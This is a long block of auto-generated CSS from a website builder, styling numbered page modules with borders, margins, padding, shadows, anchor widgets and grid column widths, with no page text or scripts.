border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383569202 >.module_383569202{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383569202 .BodyCenter.BodyCenter383569202 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (max-width: 767px){
#module_383569202 .BodyCenter.BodyCenter383569202 {
padding-top:0.0000%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (min-width: 768px){
#module_383569202 >.module_383569202 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
@media screen and (max-width: 767px){
#module_383569202 >.module_383569202 {
margin-top:0.0000%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
#module_383569202 >.module_383569202 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383569202:hover {
border:none;
}
#module_383569202:hover >.module_383569202 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383569202 .BodyCenter{text-align:right;}
#module_383569202 .lang-text{font-size:12px;}
#module_383569202 .lang-text{font-family:arial, helvetica,sans-serif;}
#module_383569202 .lang-text{color:#666;}
#module_383569202 .lang-text{font-weight:normal;}
#module_383569202 .lang-text{text-decoration:initial;}
#module_383569202 .lang-text{font-style:normal;}
#module_383569202 .lang-list{background-color:#fff;}
#module_383569202 .lang-list{background-image:none;}
#module_383569202 .lang-list{background-repeat:no-repeat;}
#module_383569202 .lang-list{}
#module_383569202 .lang-list{}
#module_383569202 .lang-list{}
#module_383569202 li:hover .lang-text,#module_383569202 .lang-text.current{font-size:12px;}
#module_383569202 li:hover .lang-text,#module_383569202 .lang-text.current{font-family:arial, helvetica,sans-serif;}
#module_383569202 li:hover .lang-text,#module_383569202 .lang-text.current{color:#f10215;}
#module_383569202 li:hover .lang-text,#module_383569202 .lang-text.current{font-weight:normal;}
#module_383569202 li:hover .lang-text,#module_383569202 .lang-text.current{text-decoration:initial;}
#module_383569202 li:hover .lang-text,#module_383569202 .lang-text.current{font-style:normal;}

.ModuleImageGiant.layout-101 .BodyCenter{
	text-align:center;
}
.ModuleImageGiant.layout-101 img{
	margin: auto;
    max-width: 100%;
	border: none;
}

.module_383568812 .ModuleHead .HeadCenter{float:none;}
#module_383568812 {
padding:0px;
}
#module_383568812 {
position:static;
z-index:0;
top:0px;
width:100%;
height: auto;
}
#module_383568812 .ModuleHead383568812 {
display:none;
}
#module_383568812 .BodyCenter.BodyCenter383568812 {
background:none;background-color:rgba(0,0,0,0);
}
#module_383568812 >.module_383568812 {
border-top-style:solid;
border-top-color:#000;
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383568812 >.module_383568812{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383568812 .BodyCenter.BodyCenter383568812 {
padding-top:0.0000%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568812 .BodyCenter.BodyCenter383568812 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (min-width: 768px){
#module_383568812 >.module_383568812 {
margin-top:4.1841%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568812 >.module_383568812 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
#module_383568812 >.module_383568812 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383568812:hover {
border:none;
}
#module_383568812:hover >.module_383568812 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383568812 img{border-top-color:transparent;}
#module_383568812 img{border-top-style:none;}
#module_383568812 img{border-top-width:0px;}
#module_383568812 img{border-right-color:transparent;}
#module_383568812 img{border-right-style:none;}
#module_383568812 img{border-right-width:0px;}
#module_383568812 img{border-bottom-color:transparent;}
#module_383568812 img{border-bottom-style:none;}
#module_383568812 img{border-bottom-width:0px;}
#module_383568812 img{border-left-color:transparent;}
#module_383568812 img{border-left-style:none;}
#module_383568812 img{border-left-width:0px;}
#module_383568812 img{border-top-left-radius:0px;}
#module_383568812 img{border-top-right-radius:0px;}
#module_383568812 img{border-bottom-left-radius:0px;}
#module_383568812 img{border-bottom-right-radius:0px;}
#module_383568812 .BodyCenter{text-align: center;}
.module_383568813 .ModuleHead .HeadCenter{float:none;}
#module_383568813 {
padding:0px;
}
#module_383568813 {
position:static;
z-index:0;
top:0px;
width:100%;
height: auto;
}
#module_383568813 .ModuleHead383568813 {
display:none;
}
#module_383568813 {
border:none;
}
@media screen and (min-width: 768px){
#module_383568813 >.module_383568813 {
margin-top:2.9289%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568813 >.module_383568813 {
}
}

#module_383568813 img{border-top-color:transparent;}
#module_383568813 img{border-top-style:none;}
#module_383568813 img{border-top-width:0px;}
#module_383568813 img{border-right-color:transparent;}
#module_383568813 img{border-right-style:none;}
#module_383568813 img{border-right-width:0px;}
#module_383568813 img{border-bottom-color:transparent;}
#module_383568813 img{border-bottom-style:none;}
#module_383568813 img{border-bottom-width:0px;}
#module_383568813 img{border-left-color:transparent;}
#module_383568813 img{border-left-style:none;}
#module_383568813 img{border-left-width:0px;}
#module_383568813 img{border-top-left-radius:0px;}
#module_383568813 img{border-top-right-radius:0px;}
#module_383568813 img{border-bottom-left-radius:0px;}
#module_383568813 img{border-bottom-right-radius:0px;}
#module_383568813 .BodyCenter{text-align: center;}
.module_491949056 .ModuleHead .HeadCenter{float:none;}
#module_491949056 {
padding:0px;
}
#module_491949056 {
position:static;
z-index:0;
top:0px;
width:100%;
height: auto;
}
#module_491949056 .ModuleHead491949056 {
display:none;
}
#module_491949056 {
border:none;
}
@media screen and (min-width: 768px){
#module_491949056 >.module_491949056 {
margin-top:3.3996%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_491949056 >.module_491949056 {
}
}

#module_491949056 img{border-top-color:transparent;}
#module_491949056 img{border-top-style:none;}
#module_491949056 img{border-top-width:0px;}
#module_491949056 img{border-right-color:transparent;}
#module_491949056 img{border-right-style:none;}
#module_491949056 img{border-right-width:0px;}
#module_491949056 img{border-bottom-color:transparent;}
#module_491949056 img{border-bottom-style:none;}
#module_491949056 img{border-bottom-width:0px;}
#module_491949056 img{border-left-color:transparent;}
#module_491949056 img{border-left-style:none;}
#module_491949056 img{border-left-width:0px;}
#module_491949056 img{border-top-left-radius:0px;}
#module_491949056 img{border-top-right-radius:0px;}
#module_491949056 img{border-bottom-left-radius:0px;}
#module_491949056 img{border-bottom-right-radius:0px;}
#module_491949056 .BodyCenter{text-align: center;}
.module_383568457 .ModuleHead .HeadCenter{float:none;}
#module_383568457 {
padding:0px;
}
#module_383568457 {
position:static;
z-index:0;
top:0px;
width:100%;
height: auto;
}
#module_383568457 .ModuleHead383568457 {
display:none;
}
#module_383568457 {
border:none;
}
@media screen and (min-width: 768px){
#module_383568457 .BodyCenter.BodyCenter383568457 {
padding-top:2.6674%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568457 .BodyCenter.BodyCenter383568457 {
}
}

#module_383568457 .ModuleSubContainer{background-color:transparent;}
#module_383568457 .ModuleSubContainer{}
#module_383568457 .ModuleSubContainer{background-repeat:no-repeat;}
#module_383568457 .ModuleSubContainer{background-position:0% 0%;}
#module_383568457 .ModuleSubContainer{background-attachment:scroll;}
#module_383568457 .ModuleSubContainer{}
#module_383568457 {!bgVideo!}{bgVideoUrl:}
#module_383568457 .gridBgVideo .bgVideoMask{opacity:0.2}
#module_383568457 .ModuleSubContainer{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0); transition: box-shadow 0.5s ease;}
#module_383568457 .ModuleSubContainer:hover{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0);}
.ModuleGridContainer.ModuleGridContainer383568457 {}
.ModuleGridContainer.ModuleGridContainer383568457 .SubPadding {width:0px;}
.module_383569175 .ModuleHead .HeadCenter{float:none;}
#module_383569175 {
padding:0px;
}
#module_383569175 {
position:static;
z-index:2;
top:41px;
left:0px;
width:100%;
height: auto;
}
#module_383569175 .ModuleHead383569175 {
display:none;
}
#module_383569175 {
border:none;
}
@media screen and (min-width: 768px){
#module_383569175 >.module_383569175 {
margin-top:12.1667%;
margin-left:0.0000%;
margin-right:11.5000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383569175 >.module_383569175 {
}
}

#module_383569175 .ModuleImageTextGiantContent{margin-top:0px;}
#module_383569175 .ModuleImageTextGiantContent{margin-bottom:0px;}
#module_383569175 .ModuleImageTextGiantContent{margin-left:0px;}
#module_383569175 .ModuleImageTextGiantContent{margin-right:0px;}
#module_383569175 .imageTextGiant-Container{padding-top:10px;}
#module_383569175 .imageTextGiant-Container{padding-bottom:10px;}
#module_383569175 .imageTextGiant-Container{padding-left:10px;}
#module_383569175 .imageTextGiant-Container{padding-right:10px;}
#module_383569175 .showHandle .btn{font-size:14px;}
#module_383569175 .showHandle .btn{font-family:;}
#module_383569175 .showHandle .btn{color:#333;}
#module_383569175 .showHandle .btn{font-weight:400;}
#module_383569175 .showHandle .btn{text-decoration:none;}
#module_383569175 .showHandle .btn{font-style:normal;}
#module_383569175 .showHandle div{border-top-color:#ddd !important;}
#module_383569175 .showHandle div{border-top-style:solid !important;}
#module_383569175 .showHandle div{border-top-width:1px !important;}
#module_383569175 .showHandle{background-color:transparent;}
#module_383569175 .showHandle{}
#module_383569175 .showHandle{background-repeat:no-repeat;}
#module_383569175 .showHandle{}
#module_383569175 .showHandle{}
#module_383569175 .showHandle{}
#module_383569175 a{font-size:unset;font-family:unset}
.ModuleGridContainer.ModuleGridContainer383568457 #Sub383568457_1 {width:50%;}
.module_383568817 .ModuleHead .HeadCenter{float:none;}
#module_383568817 {
padding:0px;
}
#module_383568817 {
position:static;
z-index:0;
width:100%;
height: auto;
}
#module_383568817 .ModuleHead383568817 {
display:none;
}

#module_383568817 img{border-top-color:transparent;}
#module_383568817 img{border-top-style:none;}
#module_383568817 img{border-top-width:0px;}
#module_383568817 img{border-right-color:transparent;}
#module_383568817 img{border-right-style:none;}
#module_383568817 img{border-right-width:0px;}
#module_383568817 img{border-bottom-color:transparent;}
#module_383568817 img{border-bottom-style:none;}
#module_383568817 img{border-bottom-width:0px;}
#module_383568817 img{border-left-color:transparent;}
#module_383568817 img{border-left-style:none;}
#module_383568817 img{border-left-width:0px;}
#module_383568817 img{border-top-left-radius:0px;}
#module_383568817 img{border-top-right-radius:0px;}
#module_383568817 img{border-bottom-left-radius:0px;}
#module_383568817 img{border-bottom-right-radius:0px;}
#module_383568817 .BodyCenter{text-align: center;}

.ModuleGridContainer.ModuleGridContainer383568457 #Sub383568457_2 {width:50%;}
.module_383568818 .ModuleHead .HeadCenter{float:none;}
#module_383568818 {
padding:0px;
}
#module_383568818 {
position:static;
z-index:0;
top:0px;
width:100%;
height: auto;
}
#module_383568818 .ModuleHead383568818 {
display:none;
}
#module_383568818 {
border:none;
}
@media screen and (min-width: 768px){
#module_383568818 >.module_383568818 {
margin-top:3.2950%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568818 >.module_383568818 {
}
}

#module_383568818 img{border-top-color:transparent;}
#module_383568818 img{border-top-style:none;}
#module_383568818 img{border-top-width:0px;}
#module_383568818 img{border-right-color:transparent;}
#module_383568818 img{border-right-style:none;}
#module_383568818 img{border-right-width:0px;}
#module_383568818 img{border-bottom-color:transparent;}
#module_383568818 img{border-bottom-style:none;}
#module_383568818 img{border-bottom-width:0px;}
#module_383568818 img{border-left-color:transparent;}
#module_383568818 img{border-left-style:none;}
#module_383568818 img{border-left-width:0px;}
#module_383568818 img{border-top-left-radius:0px;}
#module_383568818 img{border-top-right-radius:0px;}
#module_383568818 img{border-bottom-left-radius:0px;}
#module_383568818 img{border-bottom-right-radius:0px;}
#module_383568818 .BodyCenter{text-align: center;}
.module_383568814 .ModuleHead .HeadCenter{float:none;}
#module_383568814 {
padding:0px;
}
#module_383568814 {
position:static;
z-index:0;
top:0px;
width:100%;
height: auto;
}
#module_383568814 .ModuleHead383568814 {
display:none;
}
#module_383568814 {
border:none;
}
@media screen and (min-width: 768px){
#module_383568814 >.module_383568814 {
margin-top:3.1381%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568814 >.module_383568814 {
}
}

#module_383568814 img{border-top-color:transparent;}
#module_383568814 img{border-top-style:none;}
#module_383568814 img{border-top-width:0px;}
#module_383568814 img{border-right-color:transparent;}
#module_383568814 img{border-right-style:none;}
#module_383568814 img{border-right-width:0px;}
#module_383568814 img{border-bottom-color:transparent;}
#module_383568814 img{border-bottom-style:none;}
#module_383568814 img{border-bottom-width:0px;}
#module_383568814 img{border-left-color:transparent;}
#module_383568814 img{border-left-style:none;}
#module_383568814 img{border-left-width:0px;}
#module_383568814 img{border-top-left-radius:0px;}
#module_383568814 img{border-top-right-radius:0px;}
#module_383568814 img{border-bottom-left-radius:0px;}
#module_383568814 img{border-bottom-right-radius:0px;}
#module_383568814 .BodyCenter{text-align: center;}
.ModuleItem[moduletype='ModuleAnchorGiant'] {min-height: 0 !important;}
.ModuleAnchorGiant.layout-101 {
	margin-top: 0 !important;
	margin-bottom: 0 !important;
}
.ModuleAnchorGiant.layout-101 .hr-line {
	margin:0 auto;
	width: auto;
	border-top: 0 !important;
}
.ModuleAnchorGiant.layout-101 .anchors-container {
	position: absolute;
	width: 100%;
	z-index: 991;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper {
	width: 100%;
	position: absolute;
	display: -webkit-flex;
	display: flex;
	-webkit-align-items: center;
	align-items: center;
	-webkit-transform: translate(0, -50%);
	transform: translate(0, -50%);
	pointer-events: none;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor-line {
	border-top: 1px solid rgb(98,172, 255);
	-webkit-transform: scale(1.00001);
	transform: scale(1.00001);
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor-line.before {
	-webkit-flex: 1;
	flex: 1;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor-line.after-with-sections-reorganize {
	width: 68px;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor {
	height: 24px;
	width: 126px;
	pointer-events: auto;
	margin-left: 14px;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.anchor-selected .anchorContent, .anchors-container .anchorWrapper .anchor .anchorContent:hover {
	background: rgb(98,172, 255);
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor .anchorContent {
	border-top-right-radius: 12px;
	border-bottom-right-radius: 12px;
	background: rgba(98,172, 255, 0.7);
	line-height: 24px;
	text-align: left;
	box-sizing: border-box;
	height: 100%;
	cursor: move;
	position: relative;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.anchor-selected .anchorContent:before, .anchors-container .anchorWrapper .anchor .anchorContent:hover:before {
	border-right-color: rgb(98,172, 255);
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor .anchorContent:before {
	position: absolute;
	right: 100%;
	content: '';
	width: 0;
	height: 0;
	border-top: 12px solid transparent;
	border-bottom: 12px solid transparent;
	border-right: 15px solid rgba(98,172, 255, 0.7);
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.top {
	position: relative;
	top: 28px;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.top .anchorContent:before {
	right: unset;
	bottom: 100%;
	left: 46px;
	border-left: 12px solid transparent;
	border-right: 12px solid transparent;
	border-bottom: 15px solid rgba(98,172, 255, 0.7);
	border-bottom-color: rgb(98,172, 255);
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.bottom {
	position: relative;
	bottom: 28px;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.bottom .anchorContent:before {
	right: unset;
	top: 100%;
	left: 46px;
	border-left: 12px solid transparent;
	border-right: 12px solid transparent;
	border-top: 15px solid rgba(98,172, 255, 0.7);
	border-top-color: rgb(98,172, 255);
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.top .anchorContent:after,.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.bottom .anchorContent:after {
	position: absolute;
	right: 99%;
	content: '';
	width: 12px;
	height: 24px;
	background: rgb(98,172, 255);
	border-top-left-radius: 12px;
	border-bottom-left-radius: 12px;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor-line.top,.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor-line.bottom {
	-webkit-transform: scale(1.56);
	transform: scale(1.56);
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor .anchorIcon {
	left: 2px;
	width: 13px;
	height: 15px;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor svg {
	position: absolute;
	top: 50%;
	-webkit-transform: translate(0, -50%);
	transform: translate(0, -50%);
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor.anchor-selected .anchorContent svg *, .anchors-container .anchorWrapper .anchor .anchorContent:hover svg * {
	fill: #fff;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor .anchorName {
	white-space: nowrap;
	text-overflow: ellipsis;
	overflow: hidden;
	font-family: HelveticaNeueW01-45Ligh, HelveticaNeueW02-45Ligh, HelveticaNeueW10-45Ligh, Helvetica Neue, Helvetica, Arial, メイリオ, meiryo, ヒラギノ角ゴ pro w3, hiragino kaku gothic pro, sans-serif;
	font-size: 12px;
	position: absolute;
	left: 19px;
	width: 67px;
	color: #fff;
}
.ModuleAnchorGiant.layout-101 .anchors-container .anchorWrapper .anchor .rightIcon {
	right: 12px;
}
.module_383568403 .ModuleHead .HeadCenter{float:none;}
#module_383568403 {
padding:0px;
}
#module_383568403 {
position:static;
z-index:0;
top:0px;
width:100%;
height: auto;
}
#module_383568403 .ModuleHead383568403 {
display:none;
}

.module_383568816 .ModuleHead .HeadCenter{float:none;}
#module_383568816 {
padding:0px;
}
#module_383568816 {
position:static;
z-index:0;
width:100%;
height: auto;
}
#module_383568816 .ModuleHead383568816 {
display:none;
}
#module_383568816 {
border:none;
}
@media screen and (min-width: 768px){
#module_383568816 >.module_383568816 {
margin-top:2.8243%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568816 >.module_383568816 {
}
}

#module_383568816 img{border-top-color:transparent;}
#module_383568816 img{border-top-style:none;}
#module_383568816 img{border-top-width:0px;}
#module_383568816 img{border-right-color:transparent;}
#module_383568816 img{border-right-style:none;}
#module_383568816 img{border-right-width:0px;}
#module_383568816 img{border-bottom-color:transparent;}
#module_383568816 img{border-bottom-style:none;}
#module_383568816 img{border-bottom-width:0px;}
#module_383568816 img{border-left-color:transparent;}
#module_383568816 img{border-left-style:none;}
#module_383568816 img{border-left-width:0px;}
#module_383568816 img{border-top-left-radius:0px;}
#module_383568816 img{border-top-right-radius:0px;}
#module_383568816 img{border-bottom-left-radius:0px;}
#module_383568816 img{border-bottom-right-radius:0px;}
#module_383568816 .BodyCenter{text-align: center;}
.module_383568416 .ModuleHead .HeadCenter{float:none;}
#module_383568416 {
padding:0px;
}
#module_383568416 {
position:static;
z-index:0;
top:0px;
width:100%;
height: auto;
}
#module_383568416 .ModuleHead383568416 {
display:none;
}
#module_383568416 .BodyCenter.BodyCenter383568416 {
background:none;background-color:rgb(237, 237, 237);
}
#module_383568416 >.module_383568416 {
border-top-style:solid;
border-top-color:rgb(161, 171, 180);
border-top-width:0px;
border-left-style:solid;
border-left-color:#000;
border-left-width:0px;
border-right-style:solid;
border-right-color:#000;
border-right-width:0px;
border-bottom-style:solid;
border-bottom-color:#000;
border-bottom-width:0px;
}
#module_383568416 >.module_383568416{
overflow: hidden;
-webkit-backface-visibility:hidden;
border-top-left-radius:0px;
border-top-right-radius:0px;
border-bottom-left-radius:0px;
border-bottom-right-radius:0px;
}
@media screen and (min-width: 768px){
#module_383568416 .BodyCenter.BodyCenter383568416 {
padding-top:2.5105%;
padding-left:0.0000%;
padding-right:0.0000%;
padding-bottom:2.5105%;
}
}
@media screen and (max-width: 767px){
#module_383568416 .BodyCenter.BodyCenter383568416 {
padding-top:0px;
padding-left:0px;
padding-right:0px;
padding-bottom:0px;
}
}
@media screen and (min-width: 768px){
#module_383568416 >.module_383568416 {
margin-top:2.0921%;
margin-left:0.0000%;
margin-right:0.0000%;
margin-bottom:0.0000%;
}
}
@media screen and (max-width: 767px){
#module_383568416 >.module_383568416 {
margin-top:0px;
margin-left:0px;
margin-right:0px;
margin-bottom:0px;
}
}
#module_383568416 >.module_383568416 {box-shadow: 0px 0px 0px 0px #ccc}
#module_383568416:hover {
border:none;
}
#module_383568416:hover >.module_383568416 {box-shadow: 0px 0px 0px 0px #ccc;transition: box-shadow 0.5s ease 0s;}

#module_383568416 .ModuleSubContainer{background-color:transparent;}
#module_383568416 .ModuleSubContainer{background-image:none;}
#module_383568416 .ModuleSubContainer{background-repeat:no-repeat;}
#module_383568416 .ModuleSubContainer{background-position:0% 0%;}
#module_383568416 .ModuleSubContainer{background-attachment:scroll;}
#module_383568416 .ModuleSubContainer{}
#module_383568416 {!bgVideo!}{bgVideoUrl:}
#module_383568416 .gridBgVideo .bgVideoMask{opacity:0.2}
#module_383568416 .ModuleSubContainer{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0); transition: box-shadow 0.5s ease;}
#module_383568416 .ModuleSubContainer:hover{box-shadow:0px 0px 0px 0px rgba(0, 0, 0, 0);}
.ModuleGridContainer.ModuleGridContainer383568416 {max-width:1280px;width:auto;}
.ModuleGridContainer.ModuleGridContainer383568416 .SubPadding {width:0px;}
.module_383569013 .ModuleHead .HeadCenter{float:none;}
#module_383569013 {
padding:0px;
}
#module_383569013 {
position:static;
z-index:0;
top:4944px;
left:477px;
width:100%;
height: auto;
}
#module_383569013 .ModuleHead383569013 {
display:none;
}

#module_383569013 .ModuleImageTextGiantContent{margin-top:0px;}
#module_383569013 .ModuleImageTextGiantContent{margin-bottom:0px;}
#module_383569013 .ModuleImageTextGiantContent{margin-left:0px;}
#module_383569013 .ModuleImageTextGiantContent{margin-right:0px;}
#module_383569013 .imageTextGiant-Container{padding-top:10px;}
#module_383569013 .imageTextGiant-Container{padding-bottom:10px;}
#module_383569013 .imageTextGiant-Container{padding-left:10px;}
#module_383569013 .imageTextGiant-Container{padding-right:10px;}
#module_383569013 .showHandle .btn{font-size:14px;}
#module_383569013 .showHandle .btn{font-family:;}
#module_383569013 .showHandle .btn{color:#333;}
#module_383569013 .showHandle .btn{font-weight:400;}
#module_383569013 .showHandle .btn{text-decoration:none;}
#module_383569013 .showHandle .btn{font-style:normal;}
#module_383569013 .showHandle div{border-top-color:#ddd !important;}
#module_383569013 .showHandle div{border-top-style:solid !important;}
#module_383569013 .showHandle div{border-top-width:1px !important;}
#module_383569013 .showHandle{background-color:transparent;}
#module_383569013 .showHandle{}
#module_383569013 .showHandle{background-repeat:no-repeat;}
#module_383569013 .showHandle{}
#module_383569013 .showHandle{}
#module_383569013 .showHandle{}
#module_383569013 a{font-size:unset;font-family:unset}
.ModuleGridContainer.ModuleGridContainer383568416 #Sub383568416_1 {width:18.4375%;}
.module_383569014 .ModuleHead .HeadCenter{float:none;}
#module_383569014 {
padding:0px;
}
#module_383569014 {
position:static;
z-index:0;
top:4962px;
left:673px;
width:100%;
height: auto;
}
#module_383569014 .ModuleHead383569014 {
display:none;
}

#module_383569014 .ModuleImageTextGiantContent{margin-top:0px;}
#module_383569014 .ModuleImageTextGiantContent{margin-bottom:0px;}
#module_383569014 .ModuleImageTextGiantContent{margin-left:0px;}
#module_383569014 .ModuleImageTextGiantContent{margin-right:0px;}
#module_383569014 .imageTextGiant-Container{padding-top:10px;}
#module_383569014 .imageTextGiant-Container{padding-bottom:10px;}
#module_383569014 .imageTextGiant-Container{padding-left:10px;}
#module_383569014 .imageTextGiant-Container{padding-right:10px;}
#module_383569014 .showHandle .btn{font-size:14px;}
#module_383569014 .showHandle .btn{font-family:;}
#module_383569014 .showHandle .btn{color:#333;}
#module_383569014 .showHandle .btn{font-weight:400;}
#module_383569014 .showHandle .btn{text-decoration:none;}
#module_383569014 .showHandle .btn{font-style:normal;}
#module_383569014 .showHandle div{border-top-color:#ddd !important;}
#module_383569014 .showHandle div{border-top-style:solid !important;}
#module_383569014 .showHandle div{border-top-width:1px !important;}
#module_383569014 .showHandle{background-color:transparent;}
#module_383569014 .showHandle{}
#module_383569014 .showHandle{background-repeat:no-repeat;}
#module_383569014 .showHandle{}
#module_383569014 .showHandle{}
#module_383569014 .showHandle{}
#module_383569014 a{font-size:unset;font-family:unset}
.ModuleGridContainer.ModuleGridContainer383568416 #Sub383568416_2 {width:19.4531%;}
.module_383569012 .ModuleHead .HeadCenter{float:none;}
#module_383569012 {
padding:0px;
}
#module_383569012 {
position:static;
z-index:0;
top:4957px;
left:943px;
width:100%;
height: auto;
}
#module_383569012 .ModuleHead383569012 {
display:none;
}

#module_383569012 .ModuleImageTextGiantContent{margin-top:0px;}
#module_383569012 .ModuleImageTextGiantContent{margin-bottom:0px;}
#module_383569012 .ModuleImageTextGiantContent{margin-left:0px;}
#module_383569012 .ModuleImageTextGiantContent{margin-right:0px;}
#module_383569012 .imageTextGiant-Container{padding-top:10px;}
#module_383569012 .imageTextGiant-Container{padding-bottom:10px;}
#module_383569012 .imageTextGiant-Container{padding-left:10px;}
#module_383569012 .imageTextGiant-Container{padding-right:10px;}
#module_383569012 .showHandle .btn{font-size:14px;}
#module_383569012 .showHandle .btn{font-family:;}
#module_383569012 .showHandle .btn{color:#333;}
#module_383569012 .showHandle .btn{font-weight:400;}
#module_383569012 .showHandle .btn{text-decoration:none;}
#module_383569012 .showHandle .btn{font-style:normal;}
#module_383569012 .showHandle div{border-top-color:#ddd !important;}
#module_383569012 .showHandle div{border-top-style:solid !important;}
#module_383569012 .showHandle div{border-top-width:1px !important;}
#module_383569012 .showHandle{background-color:transparent;}
#module_383569012 .showHandle{}
#module_383569012 .showHandle{background-repeat:no-repeat;}
#module_383569012 .showHandle{}
#module_383569012 .showHandle{}
#module_383569012 .showHandle{}
#module_383569012 a{font-size:unset;font-family:unset}
.ModuleGridContainer.ModuleGridContainer383568416 #Sub383568416_3 {width:20.3125%;}
.module_383569015 .ModuleHead .HeadCenter{float:none;}
#module_383569015 {
padding:0px;
}
#module_383569015 {
position:static;
z-index:0;
top:6519px;
left:1023px;
width:100%;
height: auto;
}
#module_383569015 .ModuleHead383569015 {
display:none;
}

#module_383569015 .ModuleImageTextGiantContent{margin-top:0px;}
#module_383569015 .ModuleImageTextGiantContent{margin-bottom:0px;}
#module_383569015 .ModuleImageTextGiantContent{margin-left:0px;}
#module_383569015 .ModuleImageTextGiantContent{margin-right:0px;}
#module_383569015 .imageTextGiant-Container{padding-top:10px;}
#module_383569015 .imageTextGiant-Container{padding-bottom:10px;}
#module_383569015 .imageTextGiant-Container{padding-left:10px;}
#module_383569015 .imageTextGiant-Container{padding-right:10px;}
#module_383569015 .showHandle .btn{font-size:14px;}
#module_383569015 .showHandle .btn{font-family:;}
#module_383569015 .showHandle .btn{color:#333;}
#module_383569015 .showHandle .btn{font-weight:400;}
#module_383569015 .showHandle .btn{text-decoration:none;}
#module_383569015 .showHandle .btn{font-style:normal;}
#module_383569015 .showHandle div{border-top-color:#ddd !important;}
#module_383569015 .showHandle div{border-top-style:solid !important;}
#module_383569015 .showHandle div{border-top-width:1px !important;}
#module_383569015 .showHandle{background-color:transparent;}
#module_383569015 .showHandle{}
#module_383569015 .showHandle{background-repeat:no-repeat;}
#module_383569015 .showHandle{}
#module_383569015 .showHandle{}
#module_383569015 .showHandle{}
#module_383569015 a{font-size:unset;font-family:unset}
.ModuleGridContainer.ModuleGridContainer383568416 #Sub383568416_4 {width:18.8281%;}
.module_383571646 .ModuleHead .HeadCenter{float:none;}
#module_383571646 {
padding:0px;
}
#module_383571646 {
position:static;
z-index:1;
top:6044px;
left:1427px;
width:100%;
height: auto;
}
#module_383571646 .ModuleHead383571646 {
display:none;
}

#module_383571646 .ModuleImageTextGiantContent{margin-top:0px;}
#module_383571646 .ModuleImageTextGiantContent{margin-bottom:0px;}
#module_383571646 .ModuleImageTextGiantContent{margin-left:0px;}
#module_383571646 .ModuleImageTextGiantContent{margin-right:0px;}
#module_383571646 .imageTextGiant-Container{padding-top:10px;}
#module_383571646 .imageTextGiant-Container{padding-bottom:10px;}
#module_383571646 .imageTextGiant-Container{padding-left:10px;}
#module_383571646 .imageTextGiant-Container{padding-right:10px;}
